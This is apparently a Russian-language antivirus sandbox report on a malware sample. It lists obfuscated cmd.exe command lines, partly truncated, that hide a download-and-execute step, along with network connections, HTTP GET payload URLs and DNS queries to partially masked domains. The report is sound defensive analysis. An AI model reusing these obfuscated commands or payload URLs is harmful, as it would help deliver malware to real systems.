Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c foR ; /^f , " delims=HhFlYZ tokens= 2 " ; %v , , ^in , , ( ; ' ; , ft^^YPe , ^| , ; ^^FiNd ; "mdF" ; , ' , ) ; do ; %v, ; ; FraGMpuo41^/v^k , ; u/^r " , ; (s^eT ^ # ^ =$^...
Сетевая активность
Подключается к
- 'st###eware.com':80
- 'lu###ianart.com':80
- 'we#####ciscocuellar.com':80
- 'dr####ipthai.com':80
- 'au###obi.com.br':80
TCP
Запросы HTTP GET
- http://st###eware.com/Vm3aGb/
- http://lu###ianart.com/confirmation/QFVPsd/
- http://we#####ciscocuellar.com/ZwE4YX/
- http://www.dr####ipthai.com/img/xTB1wH/
- http://ww##.##opshipthai.com/img/xTB1wH/
- http://www.au###obi.com.br/11ueX5z/
UDP
- DNS ASK st###eware.com
- DNS ASK lu###ianart.com
- DNS ASK we#####ciscocuellar.com
- DNS ASK dr####ipthai.com
- DNS ASK ww##.##opshipthai.com
- DNS ASK au###obi.com.br
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c foR ; /^f , " delims=HhFlYZ tokens= 2 " ; %v , , ^in , , ( ; ' ; , ft^^YPe , ^| , ; ^^FiNd ; "mdF" ; , ' , ) ; do ; %v, ; ; FraGMpuo41^/v^k , ; u/^r " , ; (s^eT ^ # ^ =$^...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ft^YPe | ^FiNd "mdF"
- '<SYSTEM32>\cmd.exe' /S /D /c" ftYPe "
- '<SYSTEM32>\find.exe' "mdF"
- '<SYSTEM32>\cmd.exe' , ; ; FraGMpuo41/vk , ; u/r " , ; (s^eT ^ # ^ =$^vZ}^H-i^+^9k^(^t{^Xa'o^hn^4y@^w^g^DdFb^)Qem:l1YfruC63GpT=;c2^BWj^P^ ^S/.s^xV^z,NOE\^5)& ; ^fOR ; %G , , iN ; ; ( ^,^4^3 +16 ; ; ...
